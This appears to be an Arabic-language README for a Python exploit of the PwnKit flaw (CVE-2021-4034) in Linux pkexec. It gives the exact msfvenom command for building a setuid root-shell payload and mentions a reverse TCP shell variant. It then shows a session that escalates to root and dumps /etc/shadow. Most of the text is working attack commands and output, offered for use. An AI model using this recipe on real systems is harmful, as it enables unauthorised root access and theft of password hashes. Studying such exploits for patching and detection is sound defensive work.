
استغلال بلغة بايثون لثغرة CVE-2021-4034 (PwnKit) التي ترفع الصلاحيات إلى صلاحيات الجذر عبر pkexec، مع توليد قشرة جذر باستخدام حمولات msfvenom.
كود Python3 لاستغلال CVE-2021-4034 (PWNKIT). كان هذا تمرينًا على "هل يمكنني جعل هذا يعمل في Python؟"، وليس المقصود منه أن يكون استغلالًا قويًا. إنه يعمل لدي، وقد توجد أخطاء.
الحمولة الافتراضية تبدأ قشرة (shell) كـ root، مولّدة من msfvenom:
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
لقد اختبرت أيضًا linux/x64/shell_reverse_tcp. تأكد من تضمين
وسيطة PrependSetuid=true في msfvenom، وإلا ستحصل فقط على
قشرة (shell) كمستخدم وليس كـ root.
الكود مقتبس من blasty، والأصل متاح هنا
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#